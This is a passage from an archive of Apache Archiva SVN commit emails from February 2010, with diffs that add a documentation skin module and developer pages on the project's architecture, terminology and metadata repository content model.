xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> + --><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <prerequisites> <maven>2.0.6</maven> @@ -205,6 +202,7 @@ <module>archiva-docs</module> <module>archiva-jetty</module> <module>archiva-modules</module> + <module>skin</module> </modules> <dependencies> <dependency> @@ -1231,4 +1229,4 @@ <url>http://vmbuild.apache.org/archiva/repository/staged-archiva</url> </repository> </distributionManagement> -</project> +</project> \ No newline at end of file Propchange: archiva/branches/MRM-1025/skin/ ------------------------------------------------------------------------------ --- svn:ignore (added) +++ svn:ignore Thu Feb 11 02:53:26 2010 @@ -0,0 +1,2 @@ +target +*.iml Added: archiva/branches/MRM-1025/skin/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/skin/pom.xml?rev=908814&view=auto ============================================================================== --- archiva/branches/MRM-1025/skin/pom.xml (added) +++ archiva/branches/MRM-1025/skin/pom.xml Thu Feb 11 02:53:26 2010 @@ -0,0 +1,12 @@ +<?xml version="1.0" encoding="UTF-8"?> +<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> + <modelVersion>4.0.0</modelVersion> + <parent> + <artifactId>archiva</artifactId> + <groupId>org.apache.archiva</groupId> + <version>1.4-SNAPSHOT</version> + </parent> + <artifactId>skin</artifactId> + <name>Archiva Documentation Skin</name> +</project> Propchange: archiva/branches/MRM-1025/skin/pom.xml ------------------------------------------------------------------------------ svn:eol-style = native Modified: archiva/branches/MRM-1025/skin/src/main/resources/css/maven-theme.css URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/skin/src/main/resources/css/maven-theme.css?rev=908814&r1=905633&r2=908814&view=diff ============================================================================== --- archiva/branches/MRM-1025/skin/src/main/resources/css/maven-theme.css (original) +++ archiva/branches/MRM-1025/skin/src/main/resources/css/maven-theme.css Thu Feb 11 02:53:26 2010 @@ -169,7 +169,6 @@ } #banner { height: 93px; - background: url(../images/banner.jpg); } #navcolumn ul { margin: 5px 0 15px -0em; From [email protected] Thu Feb 11 05:29:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5790 invoked from network); 11 Feb 2010 05:29:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 05:29:37 -0000 Received: (qmail 12648 invoked by uid 500); 11 Feb 2010 05:29:37 -0000 Delivered-To: [email protected] Received: (qmail 12582 invoked by uid 500); 11 Feb 2010 05:29:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12573 invoked by uid 99); 11 Feb 2010 05:29:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 05:29:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 05:29:33 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 579C723888E2; Thu, 11 Feb 2010 05:29:12 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r908844 - in /archiva/branches/MRM-1025/archiva-modules: metadata/content-model.txt src/site/apt/index.apt src/site/apt/index.apt.vm src/site/apt/metadata.apt src/site/apt/repositories.apt src/site/apt/terminology.apt src/site/site.xml Date: Thu, 11 Feb 2010 05:29:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 11 05:29:11 2010 New Revision: 908844 URL: http://svn.apache.org/viewvc?rev=908844&view=rev Log: start developer documentation for the branch Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm - copied, changed from r908811, archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt archiva/branches/MRM-1025/archiva-modules/src/site/apt/terminology.apt Removed: archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt Modified: archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Modified: archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt?rev=908844&r1=908843&r2=908844&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt (original) +++ archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt Thu Feb 11 05:29:11 2010 @@ -166,10 +166,6 @@ *) filename (scanner-1.0-20091120.012345-1.pom) is a node, and each is distinct except for checksums, etc. -*) the top level version (1.0-SNAPSHOT) is the version best used to describe the project (the "marketed version"). It - must still be unique for lookup and comparing project versions to each other, but can contain several different - "build" artifacts. - *) Projects are just a single code project. They do not have subprojects - if such modeling needs to be done, then we can create a products tree that will map what "Archiva 1.0" contains from the other repositories. Copied: archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm (from r908811, archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt) URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm?p2=archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm&p1=archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt&r1=908811&r2=908844&rev=908844&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm Thu Feb 11 05:29:11 2010 @@ -4,5 +4,72 @@ Archiva Developer's Documentation - These documents cover the architecture of Archiva and how to work with it. + These documents cover the architecture of Archiva and how to work with it. Information for users and plugin + developers can be found instead in the + {{{http://archiva.apache.org/docs/${project.version}/index.html} main Archiva documentation}}. + <Note:> This documentation is far from complete, and mostly covers new improvements relevant to developers as they + are made, and may not cover older topics such as the <<<archiva-model>>> or <<<archiva-repository-layer>>> libraries + that are still in use and particularly coupled to certain repository types and the web interfaces. + +* Overview + + Archiva is built as a layered application. It is intended to provide a platform for dealing with repositories of + varied types, and so is built as a series of modular libraries that aim to be able to be used independently (such as + embedded scenarios, from the CLI, or within the Archiva web application). + + Central to the redesign of Archiva is the concept of a metadata content repository. Archiva separates the physical + storage of a repository from the representation it works on, allowing it to store information about the repository + in an extensible format that any plugin can operate on or add to, without all subsystems needing to know about + each other. The metadata is not specific to any repository type - for instance, the Maven 2 portions can be + completely optional. More information on the {{{./metadata.html} metadata format}} and how it is persisted is + present in the section below. + + This structure allows metadata repositories to be physically separated from the repository they represent and + remotely updated. However, it is also possible to link the repository storage via the API so that the metadata can + operate "live" on a repository, detecting changes. This also allows plugins that wish to operate directly on a + repository (for example, Maven snapshot purging). + + Similarly, the resolution strategy for resources in the repository is abstracted from the storage and metadata to + allow multiple strategies. This facilitates features such as repository proxying, repository grouping, and on the + fly format conversion. These are described in the {{{./repositories.html} Repository API}} documents. + + On top of the metadata repository, components can be built to provide the services available in the application. + These are described as plugins, though at this time there is no formal plugin registration mechanism or interface - + they are loaded by the presence of the JAR in the application classpath, with the appropriate Spring or Plexus + manifest and implementation of a core interface that they can "plug in" to. At present, these plugins interact + either due to a user request (the repository resolution extension points), a distinct scheduled task, or as part of + a repository scanning operation (the Archiva 1.0+ 'consumer' mechanism). In the future, an event mechanism is + envisaged as the main means of triggering plugin operations, further decoupling them from the core interfaces. + Plugins generally interact directly with the metadata repository to retrieve information, or store their own. + + Some examples of current plugins are: + + * Maven 2 storage repository type + + * Repository statistics + + * File-based metadata content repository persistence + + [] + + Finally, we look to the web application layers. At present, there is a single web application that serves both a + WebDAV and Struts 2-based application, and operates directly on the metadata repository and some of the legacy + APIs. Future development plans to better decouple these from the underlying plugins and legacy APIs, to allow + applications to be much more componentised in their deployment. + +** How it Works + + * {{{./terminology.html} Terminology}} + + * {{{./metadata.html} Repository metadata}} + + * {{{./repositories.html} Repository APIs}} + +* More Information + + More information is available on the Archiva Wiki: + + * {{{http://cwiki.apache.org/confluence/display/ARCHIVA/Archiva+Developer+Notes} Developer Notes}} + + * {{{http://cwiki.apache.org/confluence/display/ARCHIVA/Conventions+and+Processes} Conventions and Processes}} Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt?rev=908844&view=auto ============================================================================== (empty) Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt?rev=908844&view=auto ============================================================================== (empty) Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/terminology.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/terminology.apt?rev=908844&view=auto ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/terminology.apt (added) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/terminology.apt Thu Feb 11 05:29:11 2010 @@ -0,0 +1,84 @@ + ---- + Terminology + ---- + +Terminology + + Archiva uses a lot of pieces of data that can have heavily overloaded meaning, so it is important to ensure the + terminology used is well defined and consistently used. The following section highlights the terms used in these + documents. + +* Repository + + Repository is the most overloaded term, but when used alone it will refer to the abstract concept of anything that + can act as a repository. For example, an on-disk Maven 2 repository, a remote proxied repository, or a repository + group that appears as a single repository. + + A repository is capable of storing a number of artifacts and their associated metadata. Each artifact is identified + by a number of elements: the repository itself, it's namespace, project, project version and artifact ID. Some + components are optional, depending on the repository type being discussed - for example each is mapped in a Maven 2 + repository, while for a flat file storage only the repository and artifact ID (file path and name) is needed. + +* Namespace + + A namespace is a hierarchical grouping for projects and artifacts, allowing project and artifact IDs to more easily + be made unique within their namespace and to assist in mapping between different repository types. + + In a Maven 2 repository, this maps to the group ID of an artifact. + +* Project + + A project is a simple grouping of artifacts that share a version in a repository. It does not contain subprojects. + + In a Maven 2 repository, this maps to the artifact ID of an artifact. Note that multi-module projects will actually + represent multiple projects by default, and additional grouping (other than achieved by the namespace) would need + to be done through additional metadata. + +* Project Version + + A project version is the version best used to describe the project (the "marketed version"). It must be unique for + lookup and comparing project versions to each other, but the artifact(s) it contains may still use a different + version. For example: + + * Archiva 1.4-SNAPSHOT may have artifacts <<<archiva-1.4-20090909.123456-1.jar>>> and + <<<archiva-1.4-20100201.345612-2.jar>>>. + + * Jetty 7.0.0 may have an artifact <<<jetty-7.0.0.v20091005.jar>>> + + In a Maven 2 repository, this maps to the (base) version of a project. + +* Artifact ID + + The artifact ID uniquely identifies an artifact within a given namespace, project and project version. For example, + <<<archiva-1.4-20100201.345612-2.jar>>> or <<<archiva-1.4-20100201.345612-2.pom>>>. + + In a Maven 2 repository, this maps to the filename within the repository, including both the Maven artifact ID, + artifact version, classifier and type/extension. Note that the POM and the classic artifact will be stored with + separate artifact IDs, but the repository implementation stores the common information for the whole project + version (and perhaps all project versions in some instances). + +* Metadata Repository + + The metadata repository is the metadata representation of a given repository, containing information about the + artifacts it contains, as well as other auxiliary information such as statistics, events, etc. + +* Metadata Content Repository + + The metadata content repository is how the information in a metadata repository is persisted. It is effectively the + same in appearance to the metadata repository. + +* Repository Resolver + + A resolver decides how to translate a request into a given set of metadata or an artifact retrieved from repository + storage. The default resolver first queries metadata, falling back to the repository storage if available if + necessary due to not being found or being out of date. It is possible that new resolvers can be introduced to also + check proxied repositories or to group multiple repositories. + +* Repository Storage + + A physical storage medium for a type of repository. This may be a file system in Maven 2 format, a URL pointing to + a repository in a certain format, a flat set of files, etc. It can be queried and modified to affect the canonical + set of artifacts. + + + Modified: archiva/branches/MRM-1025/archiva-modules/src/site/site.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/site.xml?rev=908844&r1=908843&r2=908844&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/site.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Thu Feb 11 05:29:11 2010 @@ -32,7 +32,10 @@ </breadcrumbs> <menu name="Developers"> - <item name="About" href="/index.html" /> + <item name="Overview" href="/index.html" /> + <item name="Terminology" href="/terminology.html" /> + <item name="Metadata" href="/metadata.html" /> + <item name="Repositories" href="/repositories.html" /> </menu> <menu ref="modules" /> </body> From [email protected] Thu Feb 11 10:35:30 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97611 invoked from network); 11 Feb 2010 10:35:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 10:35:30 -0000 Received: (qmail 86354 invoked by uid 500); 11 Feb 2010 10:35:30 -0000 Delivered-To: [email protected] Received: (qmail 86293 invoked by uid 500); 11 Feb 2010 10:35:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86280 invoked by uid 99); 11 Feb 2010 10:35:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 10:35:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 10:35:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4D1DB23889DE; Thu, 11 Feb 2010 10:35:00 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r908914 - in /archiva/branches/MRM-1025/archiva-modules: metadata/content-model.txt src/site/apt/metadata.apt Date: Thu, 11 Feb 2010 10:35:00 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Thu Feb 11 10:34:59 2010 New Revision: 908914 URL: http://svn.apache.org/viewvc?rev=908914&view=rev Log: migrate metadata documentation Modified: archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt Modified: archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt?rev=908914&r1=908913&r2=908914&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt (original) +++ archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt Thu Feb 11 10:34:59 2010 @@ -1,170 +1,6 @@ -The following is the intended content model for the metadata content repository: - -. -`-- repositories/ - `-- central/ - |-- config/ - | |-- name= - | |-- storageUrl= - | `-- uri= - |-- content/ - | `-- org/ - | `-- apache/ - | |-- archiva/ - | | `-- platform/ - | | |-- scanner/ - | | | |-- 1.0-SNAPSHOT/ - | | | | |-- scanner-1.0-20091120.012345-1.pom/ - | | | | | |-- asc= - | | | | | |-- created= - | | | | | |-- fileCreated= - | | | | | |-- fileLastModified= - | | | | | |-- maven:buildNumber= - | | | | | |-- maven:classifier - | | | | | |-- maven:timestamp= - | | | | | |-- maven:type= - | | | | | |-- md5= - | | | | | |-- sha1= - | | | | | |-- size= - | | | | | |-- updated= - | | | | | `-- version= - | | | | |-- ciManagement.system= - | | | | |-- ciManagement.url= - | | | | |-- created= - | | | | |-- dependencies.0.artifactId= - | | | | |-- dependencies.0.classifier= - | | | | |-- dependencies.0.groupId= - | | | | |-- dependencies.0.optional= - | | | | |-- dependencies.0.scope= - | | | | |-- dependencies.0.systemPath= - | | | | |-- dependencies.0.type= - | | | | |-- dependencies.0.version= - | | | | |-- description= - | | | | |-- individuals.0.email= - | | | | |-- individuals.0.name= - | | | | |-- individuals.0.properties.scmId= - | | | | |-- individuals.0.roles.0= - | | | | |-- individuals.0.timezone= - | | | | |-- issueManagement.system= - | | | | |-- issueManagement.url= - | | | | |-- licenses.0.name= - | | | | |-- licenses.0.url= - | | | | |-- mailingLists.0.mainArchiveUrl= - | | | | |-- mailingLists.0.name= - | | | | |-- mailingLists.0.otherArchives.0= - | | | | |-- mailingLists.0.postAddress= - | | | | |-- mailingLists.0.subscribeAddress= - | | | | |-- mailingLists.0.unsubscribeAddress= - | | | | |-- maven:buildExtensions.0.artifactId= - | | | | |-- maven:buildExtensions.0.groupId= - | | | | |-- maven:buildExtensions.0.version= - | | | | |-- maven:packaging= - | | | | |-- maven:parent.artifactId= - | | | | |-- maven:parent.groupId= - | | | | |-- maven:parent.version= - | | | | |-- maven:plugins.0.artifactId= - | | | | |-- maven:plugins.0.groupId= - | | | | |-- maven:plugins.0.reporting= - | | | | |-- maven:plugins.0.version= - | | | | |-- maven:properties.mavenVersion= - | | | | |-- maven:repositories.0.id= - | | | | |-- maven:repositories.0.layout= - | | | | |-- maven:repositories.0.name= - | | | | |-- maven:repositories.0.plugins= - | | | | |-- maven:repositories.0.releases= - | | | | |-- maven:repositories.0.snapshots= - | | | | |-- maven:repositories.0.url= - | | | | |-- name= - | | | | |-- organization.favicon= - | | | | |-- organization.logo= - | | | | |-- organization.name= - | | | | |-- organization.url= - | | | | |-- relocatedTo.namespace= - | | | | |-- relocatedTo.project= - | | | | |-- relocatedTo.projectVersion= - | | | | |-- scm.connection= - | | | | |-- scm.developerConnection= - | | | | |-- scm.url= - | | | | |-- updated= - | | | | `-- url= - | | | `-- maven:artifactId= - | | `-- maven:groupId= - | `-- maven/ - | `-- plugins/ - | |-- maven:groupId= - | |-- maven:plugins.compiler.artifactId= - | `-- maven:plugins.compiler.name= - |-- facets/ - | |-- org.apache.archiva.audit/ - | | `-- 2010/ - | | `-- 01/ - | | `-- 19/ - | | `-- 093600.000/ - | | |-- action= - | | |-- artifact.id= - | | |-- artifact.namespace= - | | |-- artifact.projectId= - | | |-- artifact.version= - | | |-- remoteIP= - | | `-- user= - | |-- org.apache.archiva.metadata.repository.stats/ - | | `-- 2009/ - | | `-- 12/ - | | `-- 03/ - | | `-- 090000.000/ - | | |-- scanEndTime= - | | |-- scanStartTime= - | | |-- totalArtifactCount= - | | |-- totalArtifactFileSize= - | | |-- totalFileCount= - | | |-- totalGroupCount= - | | `-- totalProjectCount= - | `-- org.apache.archiva.reports/ - `-- references/ - `-- org/ - `-- apache/ - `-- archiva/ - |-- parent/ - | `-- 1/ - | `-- references/ - | `-- org/ - | `-- apache/ - | `-- archiva/ - | |-- platform/ - | | `-- scanner/ - | | `-- 1.0-SNAPSHOT/ - | | `-- referenceType=parent - | `-- web/ - | `-- webapp/ - | `-- 1.0-SNAPSHOT/ - | `-- referenceType=parent - `-- platform/ - `-- scanner/ - `-- 1.0-SNAPSHOT/ - `-- references/ - `-- org/ - `-- apache/ - `-- archiva/ - `-- web/ - `-- webapp/ - `-- 1.0-SNAPSHOT/ - `-- referenceType=dependency - -(To update - run "tree --dirsfirst -F" on the unpacked content-model.zip from the sandbox) - -Notes: - -*) config should be reflected to an external configuration file and only stored in the content repository for purposes +*) config not currently used should be reflected to an external configuration file and only stored in the content repository for purposes of accessing through a REST API, for example -*) In the above example, we have the following coordinates: - - namespace = org.apache.archiva.platform (namespaces are of arbitrary depth, and are project namespaces, not to be - confused with JCR's item/node namespaces) - - project = scanner - - version = 1.0-SNAPSHOT - - artifact = scanner-1.0-20091120.012345-1.pom - -*) filename (scanner-1.0-20091120.012345-1.pom) is a node, and each is distinct except for checksums, etc. *) Projects are just a single code project. They do not have subprojects - if such modeling needs to be done, then we can create a products tree that will map what "Archiva 1.0" contains from the other repositories. Modified: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt?rev=908914&r1=908913&r2=908914&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt Thu Feb 11 10:34:59 2010 @@ -0,0 +1,269 @@ + ---- + Metadata Repository + ---- + +Metadata Repository + + The metadata repository stores all known information about a repository in a common format that other plugins can + understand, and that eventually external applications will be able to query. + + Dealing with metadata repositories covers two aspects: the content model, and the content repository access API + (and persistence). + +* Content Model + + The following is a sample tree that represents the content model: + +---- +. +`-- repositories/ + `-- central/ + |-- config/ + | |-- name= + | |-- storageUrl= + | `-- uri= + |-- content/ + | `-- org/ + | `-- apache/ + | |-- archiva/ + | | `-- platform/ + | | |-- scanner/ + | | | |-- 1.0-SNAPSHOT/ + | | | | |-- scanner-1.0-20091120.012345-1.pom/ + | | | | | |-- asc= + | | | | | |-- created= + | | | | | |-- fileCreated= + | | | | | |-- fileLastModified= + | | | | | |-- maven:buildNumber= + | | | | | |-- maven:classifier + | | | | | |-- maven:timestamp= + | | | | | |-- maven:type= + | | | | | |-- md5= + | | | | | |-- sha1= + | | | | | |-- size= + | | | | | |-- updated= + | | | | | `-- version= + | | | | |-- ciManagement.system= + | | | | |-- ciManagement.url= + | | | | |-- created= + | | | | |-- dependencies.0.artifactId= + | | | | |-- dependencies.0.classifier= + | | | | |-- dependencies.0.groupId= + | | | | |-- dependencies.0.optional= + | | | | |-- dependencies.0.scope= + | | | | |-- dependencies.0.systemPath= + | | | | |-- dependencies.0.type= + | | | | |-- dependencies.0.version= + | | | | |-- description= + | | | | |-- individuals.0.email= + | | | | |-- individuals.0.name= + | | | | |-- individuals.0.properties.scmId= + | | | | |-- individuals.0.roles.0= + | | | | |-- individuals.0.timezone= + | | | | |-- issueManagement.system= + | | | | |-- issueManagement.url= + | | | | |-- licenses.0.name= + | | | | |-- licenses.0.url= + | | | | |-- mailingLists.0.mainArchiveUrl= + | | | | |-- mailingLists.0.name= + | | | | |-- mailingLists.0.otherArchives.0= + | | | | |-- mailingLists.0.postAddress= + | | | | |-- mailingLists.0.subscribeAddress= + | | | | |-- mailingLists.0.unsubscribeAddress= + | | | | |-- maven:buildExtensions.0.artifactId= + | | | | |-- maven:buildExtensions.0.groupId= + | | | | |-- maven:buildExtensions.0.version= + | | | | |-- maven:packaging= + | | | | |-- maven:parent.artifactId= + | | | | |-- maven:parent.groupId= + | | | | |-- maven:parent.version= + | | | | |-- maven:plugins.0.artifactId= + | | | | |-- maven:plugins.0.groupId= + | | | | |-- maven:plugins.0.reporting= + | | | | |-- maven:plugins.0.version= + | | | | |-- maven:properties.mavenVersion= + | | | | |-- maven:repositories.0.id= + | | | | |-- maven:repositories.0.layout= + | | | | |-- maven:repositories.0.name= + | | | | |-- maven:repositories.0.plugins= + | | | | |-- maven:repositories.0.releases= + | | | | |-- maven:repositories.0.snapshots= + | | | | |-- maven:repositories.0.url= + | | | | |-- name= + | | | | |-- organization.favicon= + | | | | |-- organization.logo= + | | | | |-- organization.name= + | | | | |-- organization.url= + | | | | |-- relocatedTo.namespace= + | | | | |-- relocatedTo.project= + | | | | |-- relocatedTo.projectVersion= + | | | | |-- scm.connection= + | | | | |-- scm.developerConnection= + | | | | |-- scm.url= + | | | | |-- updated= + | | | | `-- url= + | | | `-- maven:artifactId= + | | `-- maven:groupId= + | `-- maven/ + | `-- plugins/ + | |-- maven:groupId= + | |-- maven:plugins.compiler.artifactId= + | `-- maven:plugins.compiler.name= + |-- facets/ + | |-- org.apache.archiva.audit/ + | | `-- 2010/ + | | `-- 01/ + | | `-- 19/ + | | `-- 093600.000/ + | | |-- action= + | | |-- artifact.id= + | | |-- artifact.namespace= + | | |-- artifact.projectId= + | | |-- artifact.version= + | | |-- remoteIP= + | | `-- user= + | |-- org.apache.archiva.metadata.repository.stats/ + | | `-- 2009/ + | | `-- 12/ + | | `-- 03/ + | | `-- 090000.000/ + | | |-- scanEndTime= + | | |-- scanStartTime= + | | |-- totalArtifactCount= + | | |-- totalArtifactFileSize= + | | |-- totalFileCount= + | | |-- totalGroupCount= + | | `-- totalProjectCount= + | `-- org.apache.archiva.reports/ + `-- references/ + `-- org/ + `-- apache/ + `-- archiva/ + |-- parent/ + | `-- 1/ + | `-- references/ + | `-- org/ + | `-- apache/ + | `-- archiva/ + | |-- platform/ + | | `-- scanner/ + | | `-- 1.0-SNAPSHOT/ + | | `-- referenceType=parent + | `-- web/ + | `-- webapp/ + | `-- 1.0-SNAPSHOT/ + | `-- referenceType=parent + `-- platform/ + `-- scanner/ + `-- 1.0-SNAPSHOT/ + `-- references/ + `-- org/ + `-- apache/ + `-- archiva/ + `-- web/ + `-- webapp/ + `-- 1.0-SNAPSHOT/ + `-- referenceType=dependency +---- + + ~~ To update - run "tree --dirsfirst -F" on the unpacked content-model.zip from the sandbox + + This uses a typical content repository structure, where there is a path to a particular node (the last paths in + the structure above), and nodes can have properties and values (shown as <<<property=value>>> above). + + <Note:> Some of the properties have been put in place temporarily but need to be revisited - for example the use + of index counters for the lists of Maven POM information are not ideal. + + The following sections walk through parts of the tree. + +** Configuration section + + ... + +** Content section + + The content section houses the information directly about the artifacts in the repository. As described in the + {{{./terminology.html} Terminology}} document, artifacts are described by the following coordinates (with the values + shown from the example above): + + * Namespace (<<<org.apache.archiva.platform>>>) - namespaces are of arbitrary depth, and are project namespaces, + not to be confused with JCR's item/node namespaces + + * Project ID (<<<scanner>>>) + + * Project version (<<<1.0-SNAPSHOT>>>) + + * Artifact ID (<<<scanner-1.0-20091120.012345-1.pom>>>) + + [] + + Each artifact in the repository will contain an entry, though not necessarily every file. For example, in a Maven + repository it is known that the <<<.md5>>>, <<<.sha1>>> and <<<.asc>>> files represent metadata about the artifact + of the same name, so that is attached to that node instead. + + Metadata is stored at the level most appropriate to that piece of information. This means that in a Maven + repository, while both the POM and other artifact(s) are considered be separate artifacts, they all share the + information in the POM that is stored at the project version or even project level. + + The following describes some of the metadata at each level. Note that the Maven extensions are covered here - these + are optional, and they wouldn't be present on a non-Maven storage repository. Likewise, plugins may store + additional metadata for each artifact. + +*** Namespace Metadata + + * <<<maven:groupId>>> - the Maven group ID + +*** Project Metadata + + * <<<maven:artifactId>>> - the Maven artifact ID + +*** Project Version Metadata + + * <<<created>>> - when the artifact was added to the repository + + * <<<updated>>> - when the artifact was last updated + + * <<<name>>> - human-readable project name + + * <<<description>>> - a human-readable description of this project + + * <<<url>>> - a URL to the project's documentation or other information + + * <<<organization[].*>>> - information about the organization + + * <<<licenses[].*>>> - the license the project source code is available under + + * <<<issueManagement.*>>> - the issue tracker used by the application + + * <<<ciManagement.*>>> - continuous integration server information + + * <<<dependencies[].*>>> - other projects that this project version depends on. Note that currently this contains + Maven specifics that are expected to be abstracted out into the Maven extensions + + * <<<individuals[].*>>> - participants in the development of, or otherwise associated with, the project + + * <<<scm.*>>> - information about the SCM used to store the project source code + + * <<<relocatedTo.*>>> - co-ordinates that this artifact has been relocated to + + * <<<maven:packaging>>> - the packaging value in the Maven POM + + * <<<maven:parent.*>>> - a reference to the Maven parent POM + + * <<<maven.plugins[].*>>> - references to build plugins in a Maven POM + + * <<<maven.repositories[].*>>> - references to other repositories in a Maven POM + + * <<<maven:buildExtensions[].*>>> - references to build extensions in a Maven POM + + * <<<maven:properties.*>>> - properties stored in a Maven POM + + + ~~ information about it (notes to convert) + + ~~ Java API + + ~~ access + + ~~ persistence + From [email protected] Thu Feb 11 13:28:22 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61644 invoked from network); 11 Feb 2010 13:28:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 13:28:22 -0000 Received: (qmail 77746 invoked by uid 500); 11 Feb 2010 13:28:22 -0000 Delivered-To: [email protected] Received: (qmail 77684 invoked by uid 500); 11 Feb 2010 13:28:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77675 invoked by uid 99); 11 Feb 2010 13:28:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 13:28:22 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 13:28:21 +0000 Received: by eris.apache.org 